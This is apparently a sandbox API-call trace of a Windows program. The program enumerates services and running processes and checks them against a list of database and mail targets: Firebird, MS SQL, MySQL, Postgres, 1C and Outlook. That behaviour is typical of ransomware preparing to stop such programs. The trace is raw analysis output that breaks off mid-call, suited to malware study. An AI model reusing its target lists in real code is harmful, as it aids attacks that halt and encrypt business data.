[0050.610] lstrlenW (lpString="LanmanWorkstation") returned 17 [0050.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.610] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0050.610] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0050.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0050.610] lstrlenW (lpString="lmhosts") returned 7 [0050.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0050.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0050.610] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0050.610] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0050.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0050.610] lstrlenW (lpString="MMCSS") returned 5 [0050.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0050.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0050.610] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0050.610] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0050.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0050.610] lstrlenW (lpString="MpsSvc") returned 6 [0050.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0050.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0050.610] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0050.611] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0050.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0050.611] lstrlenW (lpString="Netman") returned 6 [0050.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0050.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0050.611] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0050.611] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0050.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0050.611] lstrlenW (lpString="netprofm") returned 8 [0050.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0050.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0050.611] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0050.611] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0050.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0050.611] lstrlenW (lpString="NlaSvc") returned 6 [0050.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0050.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0050.611] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0050.611] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0050.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0050.611] lstrlenW (lpString="nsi") returned 3 [0050.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0050.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0050.611] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0050.611] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0050.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0050.611] lstrlenW (lpString="PcaSvc") returned 6 [0050.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0050.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0050.611] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0050.611] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0050.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0050.611] lstrlenW (lpString="PlugPlay") returned 8 [0050.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0050.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0050.612] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0050.612] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0050.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0050.612] lstrlenW (lpString="Power") returned 5 [0050.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0050.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0050.612] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0050.612] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0050.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0050.612] lstrlenW (lpString="ProfSvc") returned 7 [0050.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0050.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0050.612] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0050.612] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0050.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0050.612] lstrlenW (lpString="RpcEptMapper") returned 12 [0050.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.612] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0050.612] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0050.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0050.612] lstrlenW (lpString="RpcSs") returned 5 [0050.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0050.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0050.612] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0050.612] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0050.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0050.612] lstrlenW (lpString="SamSs") returned 5 [0050.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0050.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0050.612] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0050.612] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0050.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0050.612] lstrlenW (lpString="Schedule") returned 8 [0050.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0050.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0050.612] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0050.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0050.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0050.613] lstrlenW (lpString="SENS") returned 4 [0050.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0050.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0050.613] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0050.613] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0050.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0050.613] lstrlenW (lpString="ShellHWDetection") returned 16 [0050.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.613] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0050.613] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0050.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0050.613] lstrlenW (lpString="Spooler") returned 7 [0050.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0050.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0050.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0050.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0050.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0050.613] lstrlenW (lpString="swprv") returned 5 [0050.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0050.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0050.613] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0050.613] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0050.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0050.613] lstrlenW (lpString="SysMain") returned 7 [0050.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0050.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0050.613] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0050.613] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0050.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0050.613] lstrlenW (lpString="Themes") returned 6 [0050.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0050.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0050.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0050.614] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0050.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0050.614] lstrlenW (lpString="TrkWks") returned 6 [0050.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0050.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0050.614] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0050.614] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0050.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0050.614] lstrlenW (lpString="UxSms") returned 5 [0050.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0050.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0050.614] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0050.614] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0050.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0050.614] lstrlenW (lpString="VSS") returned 3 [0050.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0050.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0050.614] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0050.614] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0050.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0050.614] lstrlenW (lpString="WdiServiceHost") returned 14 [0050.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.614] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0050.614] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0050.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0050.614] lstrlenW (lpString="WdiSystemHost") returned 13 [0050.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.614] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0050.614] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0050.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0050.614] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0050.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.614] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0050.615] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0050.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0050.615] lstrlenW (lpString="Winmgmt") returned 7 [0050.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0050.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0050.615] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0050.615] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0050.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0050.615] lstrlenW (lpString="WPDBusEnum") returned 10 [0050.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.615] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0050.615] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0050.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0050.615] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x628500 | out: hHeap=0x5d0000) returned 1 [0050.615] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d0 [0050.617] Process32FirstW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0050.618] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0050.619] lstrlenW (lpString="System") returned 6 [0050.619] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0050.619] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0050.619] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0050.619] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0050.619] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0050.619] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0050.619] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0050.619] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0050.620] lstrlenW (lpString="smss.exe") returned 8 [0050.620] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0050.620] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0050.620] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0050.620] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0050.620] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0050.620] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0050.620] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0050.620] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.620] lstrlenW (lpString="csrss.exe") returned 9 [0050.620] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0050.620] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0050.620] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0050.620] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0050.621] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0050.621] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0050.621] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0050.621] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0050.621] lstrlenW (lpString="wininit.exe") returned 11 [0050.621] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0050.621] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0050.621] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0050.622] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.622] lstrlenW (lpString="csrss.exe") returned 9 [0050.622] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0050.623] lstrlenW (lpString="winlogon.exe") returned 12 [0050.623] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0050.624] lstrlenW (lpString="services.exe") returned 12 [0050.624] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0050.624] lstrlenW (lpString="lsass.exe") returned 9 [0050.624] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0050.625] lstrlenW (lpString="lsm.exe") returned 7 [0050.625] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.626] lstrlenW (lpString="svchost.exe") returned 11 [0050.626] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.626] lstrlenW (lpString="svchost.exe") returned 11 [0050.626] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.627] lstrlenW (lpString="svchost.exe") returned 11 [0050.627] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.628] lstrlenW (lpString="svchost.exe") returned 11 [0050.628] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.628] lstrlenW (lpString="svchost.exe") returned 11 [0050.629] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0050.629] lstrlenW (lpString="audiodg.exe") returned 11 [0050.629] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.630] lstrlenW (lpString="svchost.exe") returned 11 [0050.630] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.631] lstrlenW (lpString="svchost.exe") returned 11 [0050.631] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0050.631] lstrlenW (lpString="dwm.exe") returned 7 [0050.631] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0050.632] lstrlenW (lpString="explorer.exe") returned 12 [0050.632] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0050.633] lstrlenW (lpString="spoolsv.exe") returned 11 [0050.633] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.633] lstrlenW (lpString="taskhost.exe") returned 12 [0050.633] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.634] lstrlenW (lpString="svchost.exe") returned 11 [0050.634] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0050.635] lstrlenW (lpString="taskeng.exe") returned 11 [0050.635] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.635] lstrlenW (lpString="taskhost.exe") returned 12 [0050.635] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0050.636] lstrlenW (lpString="carried trinity.exe") returned 19 [0050.636] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0050.637] lstrlenW (lpString="heaven.exe") returned 10 [0050.637] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0050.638] lstrlenW (lpString="dell.exe") returned 8 [0050.638] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: 